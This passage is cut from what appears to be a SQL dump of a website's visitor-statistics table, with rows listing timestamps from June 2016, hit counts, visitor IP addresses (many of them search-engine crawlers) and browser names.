44802,1466396276,1,1,0,0,'51.255.65.80','other'),(44803,1466398252,1,0,1,0,'66.249.66.188',''),(44804,1466398409,1,1,0,0,'141.8.183.19','other'),(44805,1466400447,1,0,1,0,'66.249.75.199',''),(44806,1466401174,1,1,0,0,'141.8.142.61','other'),(44807,1466401766,1,1,0,0,'141.8.183.19','other'),(44808,1466405615,1,1,0,0,'37.54.115.126','firefox'),(44809,1466405846,1,1,0,0,'51.255.65.64','other'),(44810,1466406148,1,1,0,0,'78.111.189.238','chrome'),(44811,1466406909,1,0,1,0,'66.249.78.178',''),(44812,1466407409,1,1,0,0,'193.194.127.217','firefox'),(44813,1466407545,2,0,2,0,'66.249.78.171',''),(44814,1466407560,1,1,0,0,'66.249.93.147','chrome'),(44815,1466410439,1,0,1,0,'66.249.78.136',''),(44816,1466410493,1,1,0,0,'51.255.65.63','other'),(44817,1466410657,1,0,1,0,'66.249.78.178',''),(44818,1466411017,1,1,0,0,'141.8.132.10','other'),(44819,1466411589,1,0,1,0,'66.249.78.143',''),(44820,1466412276,1,1,0,0,'141.8.142.61','other'),(44821,1466412625,1,1,0,0,'91.196.178.35','firefox'),(44822,1466414118,1,0,1,0,'68.180.231.49',''),(44823,1466414686,1,1,0,0,'151.80.31.166','other'),(44824,1466414701,1,0,1,0,'66.249.69.175',''),(44825,1466414788,1,0,1,0,'66.249.78.178',''),(44826,1466416526,1,1,0,0,'37.54.115.126','firefox'),(44827,1466417229,1,1,0,0,'95.133.51.7','other'),(44828,1466417775,1,0,1,0,'66.249.66.177',''),(44829,1466421065,1,1,0,0,'51.254.141.216','other'),(44830,1466421110,1,0,1,0,'66.249.78.136',''),(44831,1466421183,1,0,1,0,'66.249.78.164',''),(44832,1466424969,1,1,0,0,'141.8.142.67','other'),(44833,1466425003,1,0,1,0,'66.249.78.136',''),(44834,1466425101,1,1,0,0,'37.54.115.126','firefox'),(44835,1466426445,1,1,0,0,'130.193.50.34','other'),(44836,1466428593,1,1,0,0,'176.77.64.61','chrome'),(44838,1466428594,1,1,0,0,'178.140.10.158','opera'),(44839,1466428645,1,1,0,0,'141.8.142.58','other'),(44840,1466430266,1,1,0,0,'37.55.56.162','firefox'),(44841,1466431061,1,1,0,0,'46.73.247.248','msie'),(44842,1466431063,1,1,0,0,'46.188.21.73','msie'),(44843,1466431065,1,1,0,0,'176.77.24.99','msie'),(44844,1466431234,1,0,1,0,'66.249.75.247',''),(44845,1466432409,1,1,0,0,'209.58.178.145','other'),(44846,1466432912,1,1,0,0,'130.193.51.19','other'),(44847,1466434521,1,1,0,0,'180.76.15.162','other'),(44848,1466435020,1,1,0,0,'37.73.214.211','chrome'),(44849,1466435247,2,2,0,0,'141.8.142.58','other'),(44850,1466435491,2,2,0,0,'141.8.183.25','other'),(44851,1466435572,3,3,0,0,'141.8.142.61','other'),(44852,1466435748,1,1,0,0,'141.8.183.19','other'),(44853,1466435770,1,0,1,0,'66.249.78.150',''),(44854,1466436093,1,1,0,0,'141.8.142.67','other'),(44855,1466436096,1,1,0,0,'178.154.149.10','other'),(44856,1466436194,1,1,0,0,'141.8.132.30','other'),(44857,1466436302,1,1,0,0,'93.158.152.51','other'),(44858,1466436350,1,1,0,0,'37.54.115.126','firefox'),(44859,1466437042,1,1,0,0,'130.193.51.79','other'),(44860,1466437276,1,1,0,0,'141.8.142.25','other'),(44861,1466437402,1,1,0,0,'141.8.183.19','other'),(44862,1466437414,1,1,0,0,'207.46.13.150','other'),(44863,1466437642,1,1,0,0,'93.158.152.51','other'),(44864,1466437786,2,2,0,0,'141.8.142.85','other'),(44865,1466437958,2,2,0,0,'130.193.50.34','other'),(44866,1466438200,1,1,0,0,'5.255.253.55','other'),(44867,1466438215,1,1,0,0,'66.249.78.143','chrome'),(44868,1466438329,1,1,0,0,'66.249.78.171','chrome'),(44869,1466438361,1,1,0,0,'141.8.142.61','other'),(44870,1466438637,1,1,0,0,'141.8.142.58','other'),(44871,1466438918,1,1,0,0,'130.193.37.7','other'),(44872,1466439056,1,1,0,0,'141.8.142.62','other'),(44873,1466439190,1,1,0,0,'5.255.253.55','other'),(44874,1466439641,1,1,0,0,'66.249.78.171','chrome'),(44875,1466439885,1,0,1,0,'66.249.78.164',''),(44876,1466440542,1,1,0,0,'91.196.178.132','chrome'),(44877,1466440945,1,1,0,0,'130.193.51.19','other'),(44878,1466443750,1,1,0,0,'141.8.142.58','other'),(44879,1466444573,1,1,0,0,'37.54.115.126','firefox'),(44880,1466444727,1,0,1,0,'66.249.78.178',''),(44881,1466445368,4,4,0,0,'144.76.61.21','other'),(44882,1466448740,1,1,0,0,'91.196.178.164','firefox'),(44883,1466449346,1,1,0,0,'66.249.78.178','chrome'),(44884,1466451414,1,1,0,0,'178.93.198.240','other'),(44885,1466452493,1,0,1,0,'66.249.78.171',''),(44886,1466453245,1,1,0,0,'141.8.183.19','other'),(44887,1466453284,1,1,0,0,'130.193.51.19','other'),(44888,1466453401,3,3,0,0,'141.8.142.61','other'),(44889,1466453410,2,2,0,0,'141.8.142.67','other'),(44890,1466453664,3,3,0,0,'130.193.50.34','other'),(44891,1466453792,5,5,0,0,'141.8.183.25','other'),(44892,1466454553,1,1,0,0,'130.193.51.19','other'),(44893,1466457343,1,1,0,0,'130.193.50.34','other'),(44894,1466458140,1,1,0,0,'79.111.140.220','msie'),(44896,1466460694,1,0,1,0,'66.249.78.164',''),(44897,1466462087,1,0,1,0,'66.249.78.178',''),(44898,1466464808,1,1,0,0,'130.193.50.34','other'),(44899,1466464820,1,0,1,0,'66.249.78.150',''),(44900,1466467162,1,0,1,0,'66.249.78.171',''),(44901,1466467211,1,0,1,0,'66.249.75.191',''),(44902,1466468211,1,1,0,0,'130.193.51.19','other'),(44903,1466468303,1,1,0,0,'180.76.15.134','other'),(44904,1466469579,1,0,1,0,'66.249.78.136',''),(44905,1466472550,1,1,0,0,'141.8.142.25','other'),(44906,1466473673,1,1,0,0,'66.249.78.143','chrome'),(44907,1466474425,1,0,1,0,'66.249.78.171',''),(44908,1466475131,1,1,0,0,'77.52.196.170','chrome'),(44909,1466475199,2,2,0,0,'178.62.249.171','other'),(44910,1466475769,1,1,0,0,'141.8.183.25','other'),(44911,1466476141,1,0,1,0,'66.249.75.239',''),(44912,1466476803,1,1,0,0,'180.76.15.154','other'),(44913,1466477935,1,0,1,0,'66.249.78.178',''),(44914,1466478863,1,0,1,0,'66.249.78.164',''),(44915,1466480157,1,1,0,0,'130.180.211.83','chrome'),(44916,1466480411,1,1,0,0,'207.46.13.150','other'),(44917,1466480559,1,1,0,0,'52.3.105.23','other'),(44918,1466482330,1,0,1,0,'66.249.78.136',''),(44919,1466483133,1,1,0,0,'37.73.230.127','other'),(44920,1466483610,1,0,1,0,'66.249.78.178',''),(44921,1466484975,1,1,0,0,'66.102.9.113','chrome'),(44922,1466485339,1,0,1,0,'66.249.78.178',''),(44923,1466485361,1,0,1,0,'66.249.78.164',''),(44924,1466485575,2,2,0,0,'52.3.105.23','other'),(44925,1466486066,5,5,0,0,'83.161.67.152','other'),(44926,1466486510,1,1,0,0,'141.8.183.25','other'),(44927,1466486526,1,1,0,0,'91.196.178.70','firefox'),(44928,1466486749,13,13,0,0,'5.9.87.111','other'),(44929,1466487173,1,1,0,0,'178.92.211.135','chrome'),(44930,1466487692,1,1,0,0,'94.179.97.79','firefox'),(44931,1466487985,1,1,0,0,'52.3.105.23','other'),(44932,1466488771,1,0,1,0,'66.249.78.178',''),(44933,1466489044,1,1,0,0,'91.196.178.70','firefox'),(44934,1466489128,2,2,0,0,'80.254.155.43','chrome'),(44935,1466489389,2,2,0,0,'52.3.105.23','other'),(44936,1466490089,1,1,0,0,'95.133.197.45','chrome'),(44937,1466490625,1,1,0,0,'52.3.105.23','other'),(44938,1466491359,1,1,0,0,'46.63.111.44','chrome'),(44939,1466491842,1,1,0,0,'93.73.234.193','firefox'),(44940,1466492554,1,1,0,0,'91.196.178.70','chrome'),(44941,1466493025,1,0,1,0,'66.249.78.178',''),(44942,1466493290,1,0,1,0,'66.249.66.182',''),(44943,1466493502,1,1,0,0,'141.8.183.25','other'),(44944,1466493567,1,0,1,0,'66.249.78.136',''),(44945,1466494206,1,1,0,0,'94.179.69.222','firefox'),(44946,1466494353,1,1,0,0,'52.3.105.23','other'),(44947,1466494753,1,0,1,0,'66.249.66.180',''),(44948,1466495078,1,0,1,0,'66.249.78.136',''),(44949,1466495426,1,1,0,0,'91.196.178.71','chrome'),(44950,1466495471,2,2,0,0,'46.63.111.44','firefox'),(44951,1466495829,1,1,0,0,'46.201.111.156','chrome'),(44952,1466496024,1,1,0,0,'91.242.55.1','chrome'),(44953,1466496064,1,1,0,0,'130.193.51.19','other'),(44954,1466496521,1,1,0,0,'95.135.236.73','chrome'),(44955,1466496842,3,3,0,0,'52.3.105.23','other'),(44956,1466497309,1,1,0,0,'91.196.178.70','firefox'),(44957,1466497397,1,1,0,0,'91.196.177.17','chrome'),(44958,1466497807,1,1,0,0,'46.201.111.156','chrome'),(44959,1466498065,1,1,0,0,'91.196.178.66','firefox'),(44960,1466499745,5,0,5,0,'68.180.229.171',''),(44961,1466500224,1,1,0,0,'91.196.178.66','chrome'),(44962,1466500560,1,1,0,0,'91.196.178.136','chrome'),(44963,1466501454,2,2,0,0,'91.196.178.71','firefox'),(44964,1466501700,2,0,2,0,'66.249.78.164',''),(44965,1466502206,1,1,0,0,'91.196.178.65','chrome'),(44966,1466502995,2,2,0,0,'130.193.51.19','other'),(44967,1466503889,1,1,0,0,'141.8.142.58','other'),(44968,1466504015,1,1,0,0,'141.8.183.25','other'),(44969,1466504068,1,0,1,0,'66.249.78.136',''),(44970,1466504115,1,1,0,0,'91.196.178.72','firefox'),(44971,1466504936,2,2,0,0,'141.8.142.58','other'),(44972,1466505431,1,1,0,0,'82.145.220.103','chrome'),(44973,1466505512,1,1,0,0,'130.193.51.19','other'),(44974,1466505737,1,1,0,0,'91.196.178.163','chrome'),(44975,1466505988,1,1,0,0,'141.8.183.25','other'),(44976,1466506219,1,1,0,0,'37.53.53.144','chrome'),(44977,1466506437,2,2,0,0,'130.193.51.19','other'),(44978,1466506575,3,3,0,0,'130.193.50.34','other'),(44979,1466507500,1,1,0,0,'141.8.183.25','other'),(44980,1466507947,1,1,0,0,'193.164.95.239','chrome'),(44981,1466508047,1,1,0,0,'94.179.35.247','chrome'),(44982,1466508318,1,0,1,0,'66.249.78.164',''),(44983,1466508643,1,1,0,0,'130.193.50.34','other'),(44984,1466508770,1,1,0,0,'141.8.142.61','other'),(44985,1466508825,1,1,0,0,'207.46.13.150','other'),(44986,1466509355,1,1,0,0,'141.8.183.25','other'),(44987,1466509731,1,0,1,0,'66.249.78.171',''),(44988,1466509778,1,0,1,0,'66.249.78.143',''),(44989,1466510066,1,1,0,0,'176.109.225.114','firefox'),(44990,1466510117,1,1,0,0,'52.3.105.23','other'),(44991,1466510337,1,1,0,0,'78.111.189.144','chrome'),(44992,1466510566,1,0,1,0,'66.249.75.239',''),(44993,1466511115,2,2,0,0,'52.3.105.23','other'),(44994,1466511551,1,1,0,0,'91.196.178.72','firefox'),(44995,1466511794,1,1,0,0,'82.145.216.242','other'),(44996,1466511910,1,1,0,0,'91.196.178.68','chrome'),(44997,1466512245,1,1,0,0,'141.8.183.25','other'),(44998,1466512392,1,1,0,0,'95.133.197.45','chrome'),(44999,1466512397,2,2,0,0,'157.55.39.71','other'),(45000,1466512504,1,1,0,0,'91.225.197.215','firefox'),(45001,1466513511,1,0,1,0,'66.249.78.164',''),(45002,1466513714,1,1,0,0,'141.8.142.58','other'),(45004,1466513908,1,1,0,0,'193.164.95.239','chrome'),(45005,1466513983,1,1,0,0,'66.249.93.150','chrome'),(45006,1466514071,1,1,0,0,'91.196.178.66','chrome'),(45007,1466514081,1,1,0,0,'66.249.78.150','chrome'),(45008,1466514416,1,1,0,0,'94.179.81.155','firefox'),(45009,1466514484,1,0,1,0,'66.249.78.136',''),(45010,1466515155,1,1,0,0,'51.255.65.73','other'),(45011,1466515722,1,1,0,0,'94.179.81.155','firefox'),(45012,1466515812,1,1,0,0,'130.193.50.6','other'),(45013,1466516037,1,1,0,0,'5.255.253.55','other'),(45014,1466516187,1,1,0,0,'93.158.152.51','other'),(45015,1466516345,1,1,0,0,'130.193.37.7','other'),(45016,1466516349,1,1,0,0,'93.158.152.26','other'),(45017,1466516536,1,1,0,0,'91.196.178.69','chrome'),(45018,1466516601,1,1,0,0,'130.193.51.19','other'),(45019,1466516734,1,1,0,0,'141.8.142.61','other'),(45020,1466517234,1,1,0,0,'37.53.224.145','chrome'),(45021,1466517931,3,3,0,0,'52.3.105.23','other'),(45022,1466519357,1,0,1,0,'66.249.78.164',''),(45023,1466519671,1,1,0,0,'141.8.142.58','other'),(45024,1466519681,2,2,0,0,'130.193.50.34','other'),(45025,1466519806,1,0,1,0,'66.249.78.150',''),(45026,1466519955,2,2,0,0,'130.193.51.19','other'),(45027,1466520104,2,2,0,0,'141.8.183.25','other'),(45028,1466521255,2,2,0,0,'52.3.105.23','other'),(45029,1466522428,1,1,0,0,'91.196.178.72','firefox'),(45030,1466522825,2,2,0,0,'130.193.51.19','other'),(45031,1466523291,2,2,0,0,'130.193.50.34','other'),(45032,1466523463,1,1,0,0,'157.55.39.218','other'),(45033,1466523983,1,0,1,0,'66.249.78.150',''),(45034,1466524316,1,1,0,0,'52.3.105.23','other'),(45035,1466525660,1,1,0,0,'69.197.177.50','other'),(45036,1466525834,2,2,0,0,'130.193.50.34','other'),(45037,1466525962,2,2,0,0,'130.193.51.19','other'),(45038,1466526225,1,1,0,0,'93.158.152.51','other'),(45039,1466526811,1,1,0,0,'141.8.142.58','other'),(45040,1466528071,1,0,1,0,'66.249.78.171',''),(45041,1466528444,1,1,0,0,'79.137.181.156','chrome'),(45042,1466529252,1,1,0,0,'82.145.218.186','other'),(45043,1466529599,2,2,0,0,'130.193.50.34','other'),(45044,1466529937,1,1,0,0,'130.193.51.19','other'),(45045,1466530727,1,1,0,0,'193.194.127.217','firefox'),(45046,1466530753,1,0,1,0,'66.249.78.143',''),(45047,1466531670,1,1,0,0,'37.55.56.136','firefox'),(45048,1466533067,1,1,0,0,'130.193.51.19','other'),(45049,1466534147,1,1,0,0,'91.196.178.67','chrome'),(45050,1466534450,1,1,0,0,'207.46.13.150','other'),(45051,1466534459,2,0,2,0,'66.249.78.171',''),(45052,1466534530,1,0,1,0,'66.249.78.164',''),(45053,1466534746,1,0,1,0,'66.249.66.177',''),(45054,1466535217,1,1,0,0,'91.196.178.67','chrome'),(45055,1466535419,1,1,0,0,'91.124.183.179','firefox'),(45056,1466535920,2,2,0,0,'141.8.183.25','other'),(45057,1466535989,2,2,0,0,'130.193.51.19','other'),(45058,1466536226,1,1,0,0,'93.158.152.40','other'),(45059,1466536298,1,1,0,0,'130.193.50.34','other'),(45060,1466536311,2,0,2,0,'66.249.78.171',''),(45061,1466536338,1,0,1,0,'66.249.66.177',''),(45062,1466536394,1,0,1,0,'66.249.66.180',''),(45063,1466536457,1,1,0,0,'141.8.142.58','other'),(45064,1466536753,1,1,0,0,'207.46.13.150','other'),(45065,1466537747,1,1,0,0,'52.3.105.23','other'),(45066,1466539695,1,1,0,0,'52.3.105.23','other'),(45067,1466540268,1,1,0,0,'130.193.50.34','other'),(45068,1466540467,1,0,1,0,'68.180.229.171',''),(45069,1466541781,1,1,0,0,'91.196.178.101','chrome'),(45070,1466542737,2,0,2,0,'66.249.78.164',''),(45071,1466543602,1,1,0,0,'130.193.51.19','other'),(45072,1466543847,1,0,1,0,'66.249.78.164',''),(45073,1466543867,1,0,1,0,'66.249.66.177',''),(45074,1466543899,1,0,1,0,'66.249.78.171',''),(45075,1466544395,2,2,0,0,'130.193.50.34','other'),(45076,1466545933,1,1,0,0,'69.30.198.242','other'),(45077,1466546900,2,2,0,0,'130.193.50.34','other'),(45078,1466547078,1,1,0,0,'157.55.39.71','other'),(45079,1466547134,4,0,4,0,'68.180.231.49',''),(45080,1466547567,1,1,0,0,'164.132.161.62','other'),(45081,1466547634,1,1,0,0,'141.8.183.25','other'),(45082,1466547898,1,1,0,0,'52.3.105.23','other'),(45083,1466547928,1,0,1,0,'66.249.78.178',''),(45084,1466548773,1,0,1,0,'68.180.231.49',''),(45085,1466550456,1,0,1,0,'66.249.78.143',''),(45086,1466550556,1,0,1,0,'66.249.78.164',''),(45087,1466550950,1,1,0,0,'69.197.177.26','other'),(45088,1466551130,1,1,0,0,'130.193.50.34','other'),(45089,1466551156,1,1,0,0,'164.132.161.40','other'),(45090,1466551422,1,1,0,0,'141.8.183.19','other'),(45091,1466551815,1,0,1,0,'66.249.78.171',''),(45092,1466552316,1,0,1,0,'66.249.78.150',''),(45093,1466552698,1,0,1,0,'66.249.78.143',''),(45094,1466553124,1,0,1,0,'66.249.78.178',''),(45095,1466553954,1,0,1,0,'66.249.78.171',''),(45096,1466554021,1,0,1,0,'66.249.66.180',''),(45097,1466554132,1,1,0,0,'164.132.161.90','other'),(45098,1466554853,1,1,0,0,'141.8.183.25','other'),(45099,1466554985,1,1,0,0,'93.158.152.84','other'),(45100,1466555160,2,2,0,0,'130.193.50.34','other'),(45101,1466555800,2,2,0,0,'52.3.105.23','other'),(45102,1466557201,1,0,1,0,'66.249.78.171',''),(45103,1466557395,1,0,1,0,'66.249.66.183',''),(45104,1466557402,1,0,1,0,'66.249.78.164',''),(45105,1466558136,1,1,0,0,'52.3.105.23','other'),(45106,1466559096,1,0,1,0,'66.249.78.178',''),(45107,1466559154,2,0,2,0,'66.249.66.183',''),(45108,1466559298,1,0,1,0,'66.249.78.171',''),(45109,1466561635,1,1,0,0,'141.8.142.61','other'),(45110,1466561763,1,1,0,0,'141.8.142.58','other'),(45111,1466561889,1,1,0,0,'141.8.183.25','other'),(45112,1466561891,1,0,1,0,'68.180.231.49',''),(45113,1466562769,1,0,1,0,'66.249.78.178',''),(45114,1466563339,10,10,0,0,'69.58.178.58','firefox'),(45115,1466564134,300,300,0,0,'5.9.123.116','other'),(45116,1466564343,1,1,0,0,'157.55.39.218','other'),(45117,1466564516,1,1,0,0,'51.255.65.95','other'),(45118,1466564719,1,1,0,0,'151.80.31.156','other'),(45119,1466565427,1,1,0,0,'130.193.51.19','other'),(45120,1466565608,2,2,0,0,'141.8.142.58','other'),(45121,1466565649,1,1,0,0,'52.3.105.23','other'),(45122,1466565710,1,0,1,0,'66.249.75.199',''),(45123,1466566074,1,1,0,0,'141.8.183.25','other'),(45124,1466566591,1,0,1,0,'66.249.66.183',''),(45125,1466566616,3,0,3,0,'66.249.78.164',''),(45126,1466566630,2,0,2,0,'66.249.78.143',''),(45127,1466566757,1,0,1,0,'66.249.66.180',''),(45128,1466566888,1,1,0,0,'52.3.105.23','other'),(45129,1466567204,41,41,0,0,'94.23.19.178','other'),(45130,1466567554,1,0,1,0,'66.249.78.171',''),(45131,1466567770,1,0,1,0,'66.249.78.136',''),(45132,1466570274,1,1,0,0,'141.8.183.19','other'),(45133,1466570660,4,4,0,0,'141.8.183.25','other'),(45134,1466570801,2,2,0,0,'130.193.51.19','other'),(45135,1466571047,2,2,0,0,'141.8.142.61','other'),(45136,1466571312,3,3,0,0,'130.193.50.34','other'),(45137,1466571627,1,1,0,0,'91.196.178.71','chrome'),(45138,1466571767,3,3,0,0,'141.8.183.25','other'),(45139,1466571858,2,2,0,0,'141.8.142.67','other'),(45140,1466572075,1,1,0,0,'93.158.152.61','other'),(45141,1466572195,1,1,0,0,'5.255.253.67','other'),(45142,1466572506,3,3,0,0,'141.8.142.61','other'),(45143,1466572676,1,1,0,0,'93.158.152.84','other'),(45144,1466572830,2,2,0,0,'141.8.142.58','other'),(45145,1466572937,1,1,0,0,'141.8.183.25','other'),(45146,1466573010,1,1,0,0,'130.193.51.19','other'),(45147,1466573073,1,1,0,0,'141.8.183.19','other'),(45148,1466573199,1,1,0,0,'5.255.253.68','other'),(45149,1466573356,1,1,0,0,'141.8.142.25','other'),(45150,1466573365,1,0,1,0,'66.249.66.188',''),(45151,1466573489,1,1,0,0,'5.255.253.55','other'),(45152,1466573640,1,1,0,0,'141.8.142.8','other'),(45153,1466573661,1,0,1,0,'66.249.78.178',''),(45154,1466573786,2,2,0,0,'141.8.142.61','other'),(45155,1466573923,1,1,0,0,'141.8.142.41','other'),(45156,1466573926,1,1,0,0,'130.193.51.81','other'),(45157,1466574055,1,1,0,0,'5.255.253.9','other'),(45158,1466574526,1,1,0,0,'52.3.105.23','other'),(45159,1466575255,1,1,0,0,'130.180.212.250','chrome'),(45160,1466575408,1,0,1,0,'66.249.78.178',''),(45161,1466576574,1,0,1,0,'68.180.229.171',''),(45162,1466576652,2,2,0,0,'130.193.50.34','other'),(45163,1466576921,1,1,0,0,'141.8.183.25','other'),(45164,1466577297,2,2,0,0,'130.193.51.19','other'),(45165,1466577361,1,1,0,0,'94.179.38.26','firefox'),(45166,1466577479,1,0,1,0,'66.249.78.143',''),(45167,1466578192,1,1,0,0,'52.3.105.23','other'),(45168,1466578409,1,1,0,0,'91.196.178.71','chrome'),(45169,1466578688,1,1,0,0,'176.9.131.69','other'),(45170,1466578711,1,1,0,0,'91.196.178.35','firefox'),(45171,1466578715,1,1,0,0,'87.244.179.70','firefox'),(45172,1466579067,1,1,0,0,'91.196.178.69','firefox'),(45173,1466579210,1,1,0,0,'178.92.171.70','chrome'),(45174,1466579353,1,0,1,0,'66.249.78.150',''),(45175,1466579360,1,1,0,0,'180.76.15.142','other'),(45176,1466579369,1,0,1,0,'66.249.78.136',''),(45177,1466580201,1,1,0,0,'141.8.142.61','other'),(45178,1466580353,2,2,0,0,'130.193.51.19','other'),(45179,1466580370,2,2,0,0,'141.8.142.58','other'),(45180,1466580480,4,4,0,0,'141.8.183.25','other'),(45181,1466580516,1,1,0,0,'141.8.142.67','other'),(45182,1466580613,1,1,0,0,'141.8.132.76','other'),(45183,1466580646,1,0,1,0,'68.180.231.49',''),(45184,1466581500,1,1,0,0,'91.196.178.65','firefox'),(45185,1466582030,1,1,0,0,'94.179.30.103','firefox'),(45186,1466582261,1,1,0,0,'91.221.70.27','opera'),(45187,1466583972,1,0,1,0,'66.249.78.164',''),(45188,1466584824,1,0,1,0,'66.249.69.249',''),(45189,1466584852,1,1,0,0,'144.76.29.66','other'),(45190,1466586032,1,1,0,0,'157.55.39.71','other'),(45191,1466586674,1,1,0,0,'178.95.211.205','opera'),(45192,1466586970,1,0,1,0,'66.249.69.249',''),(45193,1466587611,1,1,0,0,'52.3.105.23','other'),(45194,1466587621,1,1,0,0,'94.179.94.94','chrome'),(45195,1466590068,1,1,0,0,'193.242.114.125','chrome'),(45196,1466590775,1,1,0,0,'91.196.178.131','chrome'),(45197,1466591092,1,0,1,0,'66.249.78.164',''),(45198,1466591348,1,1,0,0,'141.8.142.58','other'),(45199,1466591351,1,1,0,0,'157.55.39.9','other'),(45200,1466592854,1,1,0,0,'164.132.161.78','other'),(45201,1466593144,1,1,0,0,'95.132.41.215','chrome'),(45202,1466593697,1,1,0,0,'207.46.13.81','other'),(45203,1466595215,1,1,0,0,'141.0.12.127','chrome'),(45204,1466595450,1,1,0,0,'91.196.178.71','firefox'),(45205,1466597694,1,0,1,0,'66.249.78.143',''),(45206,1466597719,1,1,0,0,'37.53.227.21','chrome'),(45207,1466597940,1,1,0,0,'141.8.142.58','other'),(45208,1466598445,1,0,1,0,'66.249.78.136',''),(45209,1466598592,1,1,0,0,'176.105.99.10','chrome'),(45210,1466600084,1,1,0,0,'46.164.131.98','chrome'),(45211,1466600503,1,1,0,0,'91.196.178.71','firefox'),(45212,1466601579,2,2,0,0,'37.53.226.87','firefox'),(45213,1466601621,1,1,0,0,'91.196.178.131','firefox'),(45214,1466602204,1,1,0,0,'37.53.227.21','chrome'),(45215,1466602417,1,1,0,0,'37.52.141.19','chrome'),(45216,1466603285,1,1,0,0,'95.132.29.107','chrome'),(45217,1466603352,1,1,0,0,'91.196.178.65','firefox'),(45218,1466603717,1,1,0,0,'89.19.7.58','firefox'),(45219,1466604054,1,1,0,0,'94.179.96.248','firefox'),(45220,1466604157,1,1,0,0,'91.196.178.66','chrome'),(45221,1466605632,1,0,1,0,'66.249.78.178',''),(45222,1466605693,1,0,1,0,'66.249.78.136',''),(45223,1466608086,1,0,1,0,'66.249.66.182',''),(45224,1466609399,1,1,0,0,'91.196.178.67','firefox'),(45225,1466609801,1,1,0,0,'141.8.142.58','other'),(45226,1466610172,1,1,0,0,'66.249.78.143','chrome'),(45227,1466611001,1,1,0,0,'185.26.182.35','opera'),(45228,1466612028,1,1,0,0,'52.3.105.23','other'),(45229,1466612481,1,0,1,0,'68.180.231.49',''),(45230,1466613702,1,0,1,0,'66.249.78.150',''),(45231,1466615443,1,0,1,0,'66.249.78.143',''),(45232,1466615663,1,1,0,0,'157.55.39.9','other'),(45233,1466616740,2,2,0,0,'207.46.13.81','other'),(45234,1466617970,1,1,0,0,'207.46.13.81','other'),(45235,1466620935,1,1,0,0,'46.164.165.218','chrome'),(45236,1466620962,1,1,0,0,'157.55.39.9','other'),(45237,1466620966,1,1,0,0,'141.8.142.58','other'),(45238,1466621473,1,0,1,0,'68.180.229.171',''),(45239,1466622018,1,1,0,0,'91.196.178.72','chrome'),(45240,1466624023,1,1,0,0,'91.196.178.163','firefox'),(45241,1466626542,1,1,0,0,'208.115.113.82','other'),(45242,1466627012,1,1,0,0,'91.196.178.104','chrome'),(45243,1466629666,1,1,0,0,'91.196.178.165','chrome'),(45244,1466634706,1,1,0,0,'130.193.50.34','other'),(45245,1466635026,1,0,1,0,'66.249.78.150',''),(45246,1466635424,1,0,1,0,'66.249.78.136',''),(45247,1466636629,1,0,1,0,'66.249.78.164',''),(45248,1466636677,4,4,0,0,'162.210.196.97','other'),(45249,1466637376,1,1,0,0,'207.46.13.81','other'),(45250,1466638488,1,1,0,0,'164.132.161.8','other'),(45251,1466641316,1,1,0,0,'66.249.75.191','chrome'),(45252,1466641497,1,1,0,0,'180.76.15.144','other'),(45253,1466641786,1,1,0,0,'130.193.51.19','other'),(45254,1466642564,1,1,0,0,'178.140.170.160','opera'),(45255,1466642566,1,1,0,0,'46.188.72.105','firefox'),(45256,1466642567,1,1,0,0,'46.147.126.174','chrome'),(45257,1466642568,1,1,0,0,'93.80.15.30','chrome'),(45258,1466642728,1,1,0,0,'157.55.39.20','other'),(45259,1466643726,1,1,0,0,'141.8.142.8','other'),(45260,1466644626,1,1,0,0,'130.193.50.34','other'),(45261,1466644686,1,1,0,0,'5.9.59.142','other'),(45262,1466647073,1,0,1,0,'66.249.78.143',''),(45263,1466647452,1,0,1,0,'66.249.78.178',''),(45264,1466647576,2,2,0,0,'66.249.78.171','chrome'),(45265,1466648919,1,1,0,0,'130.193.50.34','other'),(45266,1466649634,1,1,0,0,'176.77.61.6','msie'),(45267,1466649642,1,1,0,0,'176.14.99.33','msie'),(45268,1466649652,1,1,0,0,'37.144.4.208','msie'),(45269,1466649653,1,1,0,0,'46.242.72.198','msie'),(45270,1466653228,1,1,0,0,'91.121.157.80','other'),(45271,1466654600,1,1,0,0,'51.255.65.71','other'),(45272,1466656135,2,2,0,0,'176.9.10.227','other'),(45273,1466656690,1,1,0,0,'157.55.39.9','other'),(45274,1466657241,1,1,0,0,'91.196.178.70','firefox'),(45275,1466659177,1,1,0,0,'51.255.65.5','other'),(45276,1466660674,1,1,0,0,'66.249.93.150','chrome'),(45277,1466660754,1,1,0,0,'94.179.89.158','firefox'),(45278,1466661215,1,1,0,0,'91.196.178.72','firefox'),(45279,1466661658,1,1,0,0,'130.193.51.19','other'),(45280,1466661783,1,1,0,0,'141.8.183.25','other'),(45281,1466662508,1,1,0,0,'93.77.147.144','other'),(45282,1466662757,1,1,0,0,'209.126.127.49','other'),(45283,1466663790,1,1,0,0,'95.133.197.45','chrome'),(45284,1466664430,1,1,0,0,'207.46.13.81','other'),(45285,1466664921,1,1,0,0,'157.55.39.9','other'),(45286,1466666332,1,1,0,0,'94.179.0.156','firefox'),(45287,1466666816,1,1,0,0,'194.213.104.193','chrome'),(45288,1466666817,1,1,0,0,'194.213.104.193','chrome'),(45289,1466667034,1,1,0,0,'92.113.213.189','firefox'),(45290,1466667506,1,0,1,0,'66.249.78.171',''),(45291,1466667565,1,0,1,0,'66.249.78.143',''),(45292,1466669005,1,1,0,0,'31.128.100.166','chrome'),(45293,1466669215,1,1,0,0,'95.135.116.216','firefox'),(45294,1466669736,1,1,0,0,'178.92.170.50','chrome'),(45295,1466670263,1,0,1,0,'68.180.231.49',''),(45296,1466670540,1,1,0,0,'66.249.78.178','chrome'),(45297,1466670994,1,1,0,0,'95.132.18.144','chrome'),(45298,1466672429,1,1,0,0,'91.196.178.66','firefox'),(45299,1466672608,1,1,0,0,'91.196.178.70','firefox'),(45300,1466673169,4,4,0,0,'5.9.62.130','other'),(45301,1466674312,1,0,1,0,'66.249.78.150',''),(45302,1466675844,1,1,0,0,'40.77.167.0','other'),(45303,1466677337,1,1,0,0,'130.193.50.34','other'),(45304,1466677465,1,1,0,0,'141.8.183.25','other'),(45305,1466678743,2,2,0,0,'130.193.50.34','other'),(45306,1466680462,1,1,0,0,'91.196.178.67','chrome'),(45307,1466681805,1,1,0,0,'66.249.78.136','chrome'),(45308,1466682358,1,0,1,0,'66.249.78.164',''),(45309,1466682537,1,1,0,0,'136.243.57.34','other'),(45310,1466682821,2,2,0,0,'130.193.51.19','other'),(45311,1466682996,1,1,0,0,'141.8.142.58','other'),(45312,1466683035,1,1,0,0,'91.196.231.38','chrome'),(45313,1466683406,1,1,0,0,'91.196.176.13','chrome'),(45314,1466683415,1,1,0,0,'91.124.183.179','firefox'),(45315,1466683521,1,1,0,0,'195.211.23.206','chrome'),(45316,1466684272,1,1,0,0